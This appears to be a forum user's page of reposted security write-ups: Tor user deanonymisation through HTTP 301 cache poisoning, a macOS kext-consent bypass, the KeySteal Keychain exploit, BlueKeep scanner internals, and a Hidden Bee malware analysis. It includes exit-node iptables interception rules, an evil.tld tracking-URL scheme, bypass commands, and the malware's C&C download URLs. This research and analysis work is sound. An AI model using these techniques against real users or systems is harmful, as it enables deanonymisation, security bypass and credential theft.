Everything posted by Nytro
-
Disclosing Tor users' real IP address through 301 HTTP Redirect Cache Poisoning

Written on May 29, 2019

This blog post describes a practical application of the 'HTTP 301 Cache Poisoning' attack that can be used by a malicious Tor exit node to disclose the real IP address of chosen clients.

PoC Video

Client: Chrome Canary (76.0.3796.0)
Client real IP address: 5.60.164.177
Client tracking parameter: 6b48c94a-cf58-452c-bc50-96bace981b27
Tor exit node IP address: 51.38.150.126
Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.)

Note: In this scenario, Chrome was configured, through SOCKS5 settings, to use the Tor network. The Tor circuit was pinned to a particular test exit node: '51.38.150.126'. This is also a proof of concept, and many things can be further optimized…

On the malicious Tor exit node, all of the traffic is redirected to the Modlishka proxy:

iptables -t nat -A OUTPUT -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80
iptables -A FORWARD -j ACCEPT

https://vimeo.com/339586722

Example Attack Scenario Description

Assumptions:

A browser-based application (in this case a standard browser) that will connect through the Tor network and, finally, through a malicious Tor exit node.
A malicious Tor exit node that is intercepting all of the non-TLS HTTP traffic and poisoning it with HTTP 301 cache entries.

Let's consider the following attack scenario steps:

1. The user connects to the Internet through the Tor network, either by pointing the browser's settings at the Tor SOCKS5 proxy or system-wide, where the whole OS traffic is routed through the Tor network.
2. The user begins his typical browsing session with his favorite browser, where usually a lot of non-TLS HTTP traffic is sent through the Tor tunnel.
3. The evil Tor exit node intercepts those non-TLS requests and responds to each of them with an HTTP 301 permanent redirect. These redirects will be cached permanently by the browser and will point to a tracking URL with an assigned Tor client identifier.
The tracking URL can be created in the following way: http://user-identifier.evil.tld, where 'evil.tld' will collect all source IP information and redirect clients to the originally requested hosts … or, as an alternative, to a transparent reverse proxy that will try to intercept all of the client's subsequent HTTP traffic. Furthermore, since it is also possible to carry out automated cache pollution for the most popular domains (as described in the previous post), e.g. the Alexa Top 100, an attacker can maximize his chances of disclosing the real IP address.

The user, after closing the Tor session, will switch back to his usual network. As soon as the user types one of the previously poisoned entries, e.g. "google.com," into the URL address bar, the browser will use the cache and internally redirect to the tracking URL with the exit-node context identifier.

The exit node will now be able to correlate the previously intercepted HTTP request with the user's real IP address through the information gathered on the external host behind the tracking URL: the evil.tld host will have information about all of the IP addresses that were used to access that tracking URL. Obviously, this gives the Tor exit node the possibility to effectively correlate chosen HTTP requests with the client's IP address. This is because, thanks to the poisoned cache entries, the previously generated tracking URL will be requested by the client twice: first through the Tor tunnel and later again, after connecting through a standard ISP connection.

Another approach might rely on injecting modified JavaScript with embedded tracking URLs into the relevant non-TLS responses and setting the right cache control headers (e.g. 'Cache-Control: max-age=31536000'). However, this approach wouldn't be very effective.
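The 301 poisoning response described above can be sketched as follows. This is a minimal illustration in Python, not the actual Modlishka code; the helper name and exact header set are my own assumptions:

```python
# Sketch of the exit-node side of the attack (simplified): every intercepted
# plain-HTTP request gets a permanently cacheable 301 pointing at a
# per-client tracking host under the attacker-controlled evil.tld.

def poison_response(client_id: str, requested_host: str) -> bytes:
    # e.g. http://6b48c94a-....evil.tld/?orig=google.com
    location = f"http://{client_id}.evil.tld/?orig={requested_host}"
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {location}\r\n"
        # a year-long max-age keeps the redirect alive in the browser cache
        "Cache-Control: public, max-age=31536000\r\n"
        "Content-Length: 0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()
```

Later, evil.tld only has to log the source IP of every request carrying a known client identifier to complete the correlation.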
Tracking users through standard cookies, set by different web applications, is also possible, but it's not easy to force the client to visit the same attacker-controlled domain twice: once while it's connecting through the Tor exit node, and later after it has switched back to the standard ISP connection.

Conclusions

The fact that it is possible to achieve a certain persistency in the browser's cache, by injecting poisoned entries, can be abused by an attacker to disclose the real IP address of Tor users who send non-TLS HTTP traffic through malicious exit nodes. Furthermore, poisoning a significant number of popular domain names will increase the likelihood of receiving a callback HTTP request (with an assigned user identifier) that will disclose the user's real IP. An attempt can also be made to 'domain hook' some of the browser-based clients, in the hope that a mistyped domain name will not be noticed by the user or will not be displayed at all (e.g. in mobile application WebViews).

Possible mitigation:

When connecting through the Tor network, ensure that all non-TLS traffic is disabled. Example browser plugins that can be used: "Firefox", "Chrome". Additionally, always use the browser's 'private' mode for browsing through Tor.
Do not route all of your OS traffic through Tor without ensuring that it is TLS traffic only…
Use the latest version of the Tor Browser whenever possible for browsing web pages.

References
https://blog.duszynski.eu/domain-hijack-through-http-301-cache-poisoning/ - "HTTP 301 Cache Poisoning Attack"
https://www.torproject.org/download/ - "Tor Browser"

Source: https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/
-
How to bypass Mojave 10.14.5's new kext security

I fear with the onset of notarization, this scenario is going to become increasingly common: you've just tried to install software which you understand includes at least one kernel extension, and has worked fine before macOS 10.14.5 (which you're running). The install fails for no apparent reason. What do you do next?

The probable cause is that one or more of the kernel extensions haven't been notarized, and the security system in macOS has taken exception to that, refusing to install them. Of course there are a thousand and one other possible reasons, but here I'll assume it's the result of this change in security. Check first to ensure that you're not overlooking the normal security dialog, which invites you to open the Security & Privacy pane and agree to the extensions being installed there.

The only piece of information that you require is the developer ID of those kernel extensions. The simplest way to obtain this now is to open the Installer package using Suspicious Package. There, locate one of the kernel extensions, open the contextual menu, and export that whole kext (the folder with the extension .kext) to your Downloads folder. To get the developer ID and check whether that extension has been notarized in one fell swoop, use the spctl command in the form

spctl -a -vv -t install mykext.kext

One easy way to do this is to type most of the command

spctl -a -vv -t install

then drag and drop the extension from your Downloads folder to the end of that line, where its path and name should appear, e.g.
/Users/hoakley/Downloads/VBoxDrv.kext

Then press Return, and you should see three lines of response:

mykext.kext: accepted
source=Developer ID
origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)

If the extension is notarized already, they will instead look like:

mykext.kext: accepted
source=Notarized Developer ID
origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)

Make a note on paper or your iOS device of the developer ID provided in parentheses, as you'll need it in a few moments. Close your apps down and restart your Mac in Recovery mode. There, open Terminal and type in the command

/usr/sbin/spctl kext-consent add NJ2ABCUVC1

where the code at the end is exactly the same as the developer ID which you just obtained from spctl. Press Return, wait for the command prompt to appear again, then quit Terminal and restart in normal mode. Now when you try running the Installer package, you should find that its extensions install correctly, as you've bypassed the new kext security controls. Please let the developer know of your problems and this workaround: they need to get their kernel extensions notarized to spare other users this same rigmarole.

New spctl features and wrinkles

The man page for spctl hasn't been updated for over six years, but in 2017 it gained a set of actions to handle kernel extensions and your consent for them to be installed – what Apple terms User Approved or Secure Kernel Extension loading. You should be able to see these if you call spctl with the -h option. These kext-consent commands only work when you're booted in Recovery mode: they should return errors if you're running in regular mode. This appears to unblock kernel extensions which macOS won't install because they don't comply with the new rules on notarization, presumably by adding the kernel extension to the new whitelist which was installed as part of the macOS 10.14.5 update.
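If you prefer to extract the team ID programmatically rather than note it on paper, a small sketch (the function and regex are mine; the sample output is copied from above):

```python
import re

def developer_id(spctl_output):
    """Extract the 10-character team ID shown in parentheses by
    'spctl -a -vv -t install', e.g. NJ2ABCUVC1. Returns None if absent."""
    m = re.search(r"Developer ID Application: .+ \(([A-Z0-9]{10})\)", spctl_output)
    return m.group(1) if m else None

sample = (
    "mykext.kext: accepted\n"
    "source=Developer ID\n"
    "origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)\n"
)
print(developer_id(sample))  # NJ2ABCUVC1
```

The same pattern matches both the notarized and non-notarized variants of the output, since only the source= line differs.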
Kernel extensions which are correctly notarized should result in the display of the consent dialog taking the user to Security & Privacy; those which aren't and don't appear in the whitelist are simply blocked and not installed now.

To show whether the normal system for obtaining user consent to install extensions is enabled:

spctl kext-consent status

To enable the normal system for obtaining user consent:

spctl kext-consent enable

and disable to disable, of course. To list the developer IDs which are allowed to load extensions without user consent:

spctl kext-consent list

To add a developer ID to the list of those allowed to load kernel extensions without user consent:

spctl kext-consent add [devID]

as used above, and remove to remove it. It is strange that this control using kext-consent works at the developer ID level, and thus applies to all kernel extensions from that developer, whereas notarization is specific to an individual release of a certain code bundle from that developer.

Source: https://eclecticlight.co/2019/06/01/how-to-bypass-mojave-10-14-5s-new-kext-security/
-
KeySteal

KeySteal is a macOS <= 10.13.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt. KeySteal consists of two parts:

KeySteal Daemon: A daemon that exploits securityd to get a session that is allowed to access the Keychain without a password prompt.
KeySteal Client: A library that can be injected into apps. It will automatically apply a patch that forces the Security framework to use the session of our KeySteal daemon.

Building and Running

1. Open the KeySteal Xcode project
2. Build the keystealDaemon and keystealClient
3. Open the directory which contains the built daemon and client (right click on keystealDaemon -> Open in Finder)
4. Run dump-keychain.sh

TODO

Add a link to my talk about this vulnerability at Objective by the Sea

License

For most files, see LICENSE.txt. The following files were taken (or generated) from Security-58286.220.15 and are under the Apple Public Source License:

handletypes.h
ss_types.h
ucsp_types.h
ucsp.hpp
ucspUser.cpp

A copy of the Apple Public Source License can be found here.

Source: https://github.com/LinusHenze/Keysteal
-
-
By its nature, networking code is both complex and security critical. Any data received from the network is potentially malicious and therefore needs to be handled extremely carefully. However, the multitude of different networking protocols, such as IP, IPv6, TCP, and UDP, inevitably make the networking code very complicated, thereby making it more difficult to ensure that the code is bug free. For example, many of the functions in Apple’s networking code are thousands of lines long, with a huge number of different control flow paths to handle all the possible flags and options. Over the course of 2018, I found and reported a number of RCE vulnerabilities in iOS and macOS, all related to mbuf processing in Apple’s XNU operating system kernel: CVE-2018-4249, -4259, -4286, -4287, -4288, -4291, -4407, -4460. The mbuf datatype is used by the networking code in XNU to store and process all incoming and outgoing network packets. In this talk I will explain some of the low level details of how network packets are structured, and how the mbuf datatype is used to process them in XNU. I will discuss some of the corner cases that were handled incorrectly in XNU, making the code vulnerable to remote attack. I will also talk about how I discovered each vulnerability using custom-written variant analysis with Semmle QL (http://github.com/Semmle/QL), a research technique that complements other bug-finding techniques such as fuzzing. To finish off, I will explain the C programming techniques that I used to implement PoC exploits for each of these vulnerabilities, with demonstrations of these exploits in action (crashing the kernel).
-
Friday, May 31, 2019

Avoiding the DoS: How BlueKeep Scanners Work

Background
RDP Channel Internals
MS_T120 I/O Completion Packets
MS_T120 Port Data Dispatch
Patch Detection
Vulnerable Host Behavior
Patched Host Behavior
CPU Architecture Differences
Conclusion

Background

On May 21, @JaGoTu and I released a proof-of-concept for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep". Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed. Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

RDP Channel Internals

The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol. The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages. There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver. That should be enough information to follow the rest of this post. More background information is available from ZDI.

MS_T120 I/O Completion Packets

After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind. The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc.
The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver. Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

MS_T120 Port Data Dispatch

On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts. We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

0x0 - rdpwsx!HandleConnectProviderIndication
0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose. Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause it.

Patch Detection

I said almost any message, because if you send the right-sized packet, you will ensure that proper cleanup is performed. It's real simple: if you send an MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper cleanup, and there should be no risk of denial-of-service. The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

Vulnerable Host Behavior

On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to clean up and close the MS_T120 channel. The server then sends an MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away. And of course, with an invalid size, you get RCE/BSoD.

Patched Host Behavior

However, on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it.
Therefore, you will not receive any disconnection notice. In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU before reporting the host as patched.

CPU Architecture Differences

Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, so one might think that sending both at once would cause the denial-of-service. Simply put, besides the sizes being different, the message opcode is at a different offset. So on the opposite architecture, with a zeroed-out packet (besides the opcode), the server will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message, and other miscellaneous checks have to pass before it proceeds; the message for the other architecture will just be ignored. This difference can possibly also be used in an RCE exploit to detect whether the target is x86 or x64, if a universal payload is not used.

Conclusion

This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch; however, it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat itself and people will use this tool before a crisis. Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet. To my knowledge, the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I did, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related to the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.
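For reference, the scanner's decision logic described in this post boils down to a few lines. This is a simplified sketch with names of my own choosing; the real PoC first performs the full RDP handshake and the MS_T120 bind, then sends the valid-size 0x2 Disconnect Provider message:

```python
import socket

def classify_host(sock, timeout=5.0):
    """After the handshake, MS_T120 bind, and a valid-size 0x2 Disconnect
    Provider message have been sent: a vulnerable host cleans up the channel
    and replies with an MCS Disconnect Provider Ultimatum PDU, while a
    patched host never bound the channel, so nothing comes back."""
    sock.settimeout(timeout)
    try:
        data = sock.recv(4096)
    except socket.timeout:
        return "patched (no disconnect within timeout)"
    if data:
        return "VULNERABLE (Disconnect Provider Ultimatum received)"
    return "connection closed by peer"
```

Note that the sketch does not parse the PDU; the real scanner verifies that the reply actually is the MCS Disconnect Provider Ultimatum.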
Posted by zerosum0x0 at 12:00:00 AM

Source: https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html
-
Hidden Bee: Let's go down the rabbit hole

Posted: May 31, 2019 by hasherezade
Last updated: June 1, 2019

Some time ago, we discussed the interesting malware, Hidden Bee. It is a Chinese miner, composed of userland components as well as a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS). Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the formats used. In this post, we will take a deep dive into the functionality of the loader and the included changes.

Sample: 831d0b55ebeb5e9ae19732e18041aa54 – shared by @James_inthe_box

Overview

Hidden Bee runs silently—only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes. Initially, the main sample installs itself as a Windows service. However, once the next component is downloaded, this service is removed. The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe. If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes. Indeed, if we take a look inside each process' memory (with the help of Process Hacker), we can see atypical executable elements: the Hidden Bee implants are placed in RWX memory. Some of them lack typical PE headers, being executables in one of the multiple customized formats used by Hidden Bee. But in addition to this, we can also find PE files implanted at unusual addresses in the memory, e.g. manually-loaded PE files in the memory of WmiPrvSE.exe. Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll (NVIDIA CUDA Runtime, version 8.0.61). CUDA is a technology belonging to NVIDIA graphics cards.
So, their presence suggests that the malware uses the GPU in order to boost the mining performance. When we inspect the memory even closer, we see within the executable implants some strings referencing Lua components. Those strings are typical for the Hidden Bee miner, and they were also mentioned in the previous reports. We can also see strings referencing the mining activity, i.e. the Cryptonight miner.

List of modules:

bin/i386/coredll.bin
dispatcher.lua
bin/i386/ocl_detect.bin
bin/i386/cuda_detect.bin
bin/amd64/coredll.bin
bin/amd64/algo_cn_ocl.bin
lib/amd64/cudart64_80.dll
src/cryptonight.cl
src/cryptonight_r.cl
bin/i386/algo_cn_ocl.bin
config.lua
lib/i386/cudart32_80.dll
src/CryptonightR.cu
bin/i386/algo_cn.bin
bin/amd64/precomp.bin
bin/amd64/ocl_detect.bin
bin/amd64/cuda_detect.bin
lib/amd64/opencl.dll
lib/i386/opencl.dll
bin/amd64/algo_cn.bin
bin/i386/precomp.bin

And we can even retrieve the miner configuration (config.lua):

configuration.set("stratum.connect.timeout",20)
configuration.set("stratum.login.timeout",60)
configuration.set("stratum.keepalive.timeout",240)
configuration.set("stratum.stream.timeout",360)
configuration.set("stratum.keepalive",true)
configuration.set("job.idle.count",30)
configuration.set("stratum.lock.count",30)
configuration.set("miner.protocol","stratum+ssl://r.twotouchauthentication.online:17555/")
configuration.set("miner.username",configuration.uuid())
configuration.set("miner.password","x")
configuration.set("miner.agent","MinGate/5.1")

Inside

Hidden Bee has a long chain of components that finally leads to loading the miner. On the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are mounted in the memory of the malware, and additional plugins and configuration are retrieved from there.
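As a side note, the recovered configuration.set(...) lines can be folded into a key/value map with a short sketch (my own helper, not part of the malware's tooling; values are kept as raw Lua literals):

```python
import re

# Matches lines like: configuration.set("miner.password","x")
CONFIG_RE = re.compile(r'configuration\.set\("([^"]+)",(.+)\)$')

def parse_config(lines):
    cfg = {}
    for line in lines:
        m = CONFIG_RE.match(line.strip())
        if m:
            key, raw = m.groups()
            # strip quotes from string literals; leave numbers, booleans,
            # and expressions such as configuration.uuid() untouched
            cfg[key] = raw.strip('"') if raw.startswith('"') else raw
    return cfg
```

Running it over the dump above yields, for example, miner.agent -> MinGate/5.1 and stratum.keepalive -> true.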
Hidden Bee communicates with the C&C to retrieve the modules, along the way also using its own TCP-based protocol. The first part of the loading process is described by the following diagram. Each of the .spk packages contains a custom 'SPUTNIK' filesystem, containing more executable modules. Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process.

The loader

In contrast to most of the malware that we see nowadays, the loader is not packed by any crypter. According to the header, it was compiled in November 2018. While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader. The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded.

Section .shared contains the encrypted configuration; the last 16 bytes after the data block are the key. The configuration is decrypted with the help of the XTEA algorithm. The decrypted configuration must start with the magic WORD "pZ". It contains the C&C address and the name under which the service will be installed.

Unscrambling the NE format

The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of PE. By observing which fields have been misplaced, we can easily reconstruct the original PE. NE is one of two similar formats used by this malware; another one starts with a DWORD 0x0EF1FAB9 and is used to further load components. Both of them have an analogous structure that comes from a slightly modified PE format:

Header:
WORD magic; // 'NE'
WORD pe_offset;
WORD machine_id;

The conversion back to PE format is trivial: it is enough to add the erased magic numbers, MZ and PE, and to move the displaced fields to their original offsets.
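Assuming the header really is the only scrambled part, the conversion back to PE described above can be sketched like this (the standard PE offsets are used: e_lfanew at 0x3C and the COFF Machine field right after the PE signature; the dedicated converter mentioned in the article is authoritative):

```python
import struct

def ne_to_pe(blob: bytes) -> bytes:
    """Hedged sketch of the NE -> PE reconstruction: restore the erased
    MZ/PE magics and put the displaced header fields back in place."""
    magic, pe_offset, machine_id = struct.unpack_from("<2sHH", blob, 0)
    if magic != b"NE":
        raise ValueError("not an NE module")
    out = bytearray(blob)
    out[0:2] = b"MZ"                                   # DOS magic
    struct.pack_into("<I", out, 0x3C, pe_offset)       # e_lfanew
    out[pe_offset:pe_offset + 4] = b"PE\x00\x00"       # PE signature
    struct.pack_into("<H", out, pe_offset + 4, machine_id)  # COFF Machine
    return bytes(out)
```

Real samples may scramble more fields than the three listed in the header; this sketch only undoes what the header definition states.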
The tool that automatically does the mentioned conversion is available here. In the previous edition, the parts of Hidden Bee with analogous functionality were delivered in a different, more complex proprietary format than the one currently being analyzed.

Second stage: a downloader (in NE format)

As a result of the conversion, we get the following PE: fddfd292eaf33a490224ebe5371d3275. This module is a downloader of the next stage. The interesting thing is that the subsystem of this module is set as a driver; however, it is not loaded like a typical driver. The custom loader loads it into user space just like any typical userland component. The function at the module's Entry Point is called with three parameters. The first is the path of the main module. Then, the parameters from the configuration are passed. Example:

0012FE9C 00601A34 UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\""
0012FEA0 00407104 UNICODE "NAPCUYWKOxywEgrO"
0012FEA4 00407004 UNICODE "118.41.45.124:9000"

The execution of the module can take one of two paths. The first is meant for adding persistence: the module installs itself as a service. If the module detects that it is already running as a service, it takes the second path: in such a case, it proceeds to download the next module from the server. The next module is packed as a Cabinet file, which is passed to the unpacking function and first unpacked into a file named "core.sdb". The unpacked module is in a customized format based on PE. This time, the format has a different signature, "NS", and it is different from the aforementioned "NE" format (a detailed explanation will be given further on). It is loaded by the proprietary loader. The loader enumerates all the executables in the directory %Systemroot%\Microsoft.NET\ and selects the ones with compatible bitness (in the analyzed case it was selecting 32-bit PEs).
Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to the APC queue. In case it fails to find a suitable executable in that directory, it performs the injection into dllhost.exe instead.

Unscrambling the NS format

As mentioned before, core.sdb is in yet another format, named NS. It is also a customized PE; however, this time the conversion is more complex than for the NE format because more structures are customized. It looks like the next step in the evolution of the NE format. We can see that the changes to the PE headers are bigger and more lossy—only minimalist information is maintained, and only a few Data Directories are left. The section table is also shrunk: each section header contains only four out of the nine fields that are in the original PE. Additionally, the format allows passing a runtime argument from the loader to the payload via the header: the pointer is saved into an additional field (marked "Filled Data" in the picture). Not only is the PE header shrunk; similar customization is done on the Import Table. This custom format can also be converted back to the PE format with the help of a dedicated converter, available here.

Third stage: core.sdb

The core.sdb module converted to PE format is available here: a17645fac4bcb5253f36a654ea369bf9. The interesting part is that the external loader does not complete the full loading process of the module. It only copies the sections; the rest of the module loading, such as applying relocations and filling imports, is done internally by core.sdb. The loading function is just at the Entry Point of core.sdb. The previous component was supposed to pass core.sdb an additional buffer with the data about the installed service: the name and the path.
During its execution, core.sdb will look up this data. If found, it will delete the previously-created service and the initial file that started the infection. Getting rid of the previous persistence method suggests that it will be replaced by some different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit.

After locking a mutex in the format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before the download, a few things are checked. First of all, there is a defensive check for any of the known (blacklisted) debuggers or sniffers running; if one is found, the function quits. Also, there is a check whether the application can open the file '\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}'. If all the checks pass, the function proceeds and queries the following URL, where the GET variables contain the system fingerprint:

sltp://bbs.favcom.space:1108/setup.bin?id=999&sid=0&sz=a7854b960e59efdaa670520bb9602f87&os=65542&ar=0

The hash (sz=) is an MD5 generated from VolumeIDs. Then follows (os=), identifying the version of the operating system, and the identifier of the architecture (ar=), where 0 means 32-bit and 1 means 64-bit. The content downloaded from this URL (starting with a magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains the encrypted package (in !rbx format) and a shellcode that will be used to unpack it. The shellcode is loaded into the current process and then executed. The shellcode's start function takes three parameters: a pointer to the functions in the previous module (core.sdb), a pointer to the buffer with the encrypted data, and the size of the encrypted data.
Fourth stage: the shellcode decrypting !rbx

The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from the core.sdb module, to which it holds a pointer. It makes use of the following functions: malloc, memcpy, memfree, VirtualAlloc. Its role is to reveal another part, which comes in an encrypted package starting with the marker !rbx. The decryption function is called right at the beginning, at the Entry Point of the shellcode. First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer. The content is decrypted with the help of the RC4 algorithm and then decompressed. After decryption, the markers at the beginning of the buffer are checked: the expected format must start with the predefined magic DWORDs 0xCAFEBABE, 0, 0xBABECAFE.

The !rbx package format

!rbx is also a custom format with a consistent structure:

DWORD magic; // "!rbx"
DWORD checksum;
DWORD content_size;
BYTE rc4_key[16];
DWORD out_size;
BYTE content[];

The custom file system (BABECAFE)

The full decrypted content has a consistent structure, reminiscent of a file system. According to the previous reports, earlier versions of Hidden Bee used to adapt the ROMFS filesystem, adding a few modifications; they called their customized version "Mixed ROM FS". Now it seems that their customization process has progressed, and the keywords suggesting ROMFS can no longer be found. The header starts with markers in the form of three DWORDs: { 0xCAFEBABE, 0, 0xBABECAFE }. We notice that the layout of the BABECAFE FS differs at many points from the ROM FS from which it evolved.
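Given the structure above, an !rbx package can be parsed with a short sketch (RC4 is standard; the checksum verification and the final decompression step are omitted, since their exact algorithms are not described here):

```python
import struct

def rc4(key, data):
    # textbook RC4: key schedule followed by the PRGA keystream XOR
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def parse_rbx(blob):
    """Parse the 32-byte !rbx header and RC4-decrypt the content.
    The checksum check and decompression are intentionally left out."""
    magic, checksum, content_size = struct.unpack_from("<4sII", blob, 0)
    if magic != b"!rbx":
        raise ValueError("not an !rbx package")
    rc4_key = blob[12:28]
    (out_size,) = struct.unpack_from("<I", blob, 28)
    content = blob[32:32 + content_size]
    return rc4(rc4_key, content), out_size
```

Little-endian field order follows the struct listing above; out_size presumably holds the decompressed size.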
The structure contains the following files:

/bin/amd64/coredll.bin
/bin/i386/coredll.bin
/bin/i386/preload
/bin/amd64/preload
/pkg/sputnik.spk
/installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b)
/installer/com_x64.dll
/pkg/plugins.spk

The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format. Beginning of the !rsi package in the BABECAFE FS Each of the spk packages contains another custom filesystem, identified by the keyword SPUTNIK (possibly the extension ‘spk’ is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution. Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36 Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523. Selecting and running modules Some executables stored in the filesystem come in two versions: 32- and 64-bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader first chooses /bin/i386/preload (shellcode) and /bin/i386/coredll.bin (a module in the NS custom format). The names are hardcoded within the loading shellcode: Searching the modules in the custom file system After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area; coredll.bin is copied just after preload. Then, the preload module is called: Redirecting execution to preload The preload is position-independent, and its execution starts from the beginning of the page. Entering ‘preload’ The only role of this shellcode is to prepare and run coredll.bin. So, it contains a custom loader for the NS format that allocates another memory area and loads the NS file there. Fifth stage: preload and coredll After loading coredll, preload redirects the execution there. 
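The selection logic described above — picking the preload/coredll.bin pair that matches the current architecture — can be sketched as follows. The paths are taken from the file listing; the helper itself is hypothetical:

```python
def pick_modules(is_64bit: bool):
    # the loader only takes the pair matching the current architecture
    arch = "amd64" if is_64bit else "i386"
    # names hardcoded the same way the loading shellcode hardcodes them
    return (f"/bin/{arch}/preload", f"/bin/{arch}/coredll.bin")

print(pick_modules(False))
```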
coredll at its Entry Point The coredll patches a function inside the NTDLL— KiUserExceptionDispatcher—redirecting one of the inner calls to its own code: A patch inside KiUserExceptionDispatcher Depending on which process the coredll was injected into, it can take one of a few paths of execution. If it is running for the first time, it will try to inject itself again—this time into rundll32. For the purpose of the injection, it will again unpack the original !rbx package and use its original copy stored there. Entering the unpacking function Inside the unpacking function: checking the magic “!rbx” Then it will choose the modules depending on the bitness of the rundll32: It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the directory amd64 or from i386: If the injection failed, it makes another attempt, this time trying to inject into dllhost: Each time it uses the same, hardcoded parameter (/Processid: {...}) that is passed to the created process: The thread context of the target process is modified, and then the thread is resumed, running the injected content: Now, when we look inside the memory of rundll32, we can find the preload and coredll being mapped: Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then, another path of execution is taken. The parameter passed to the coredll decides which round of execution it is. On the second round, another injection is made: this time to dllhost.exe. And finally, it proceeds to the final round, when other modules are unpacked from the BABECAFE filesystem. Parameter deciding which path to take The unpacking function first searches by name for two more modules: sputnik.spk and plugins.spk. They are both in the mysterious !rsi format, which reminds us of !rbx, but has a slightly different structure. 
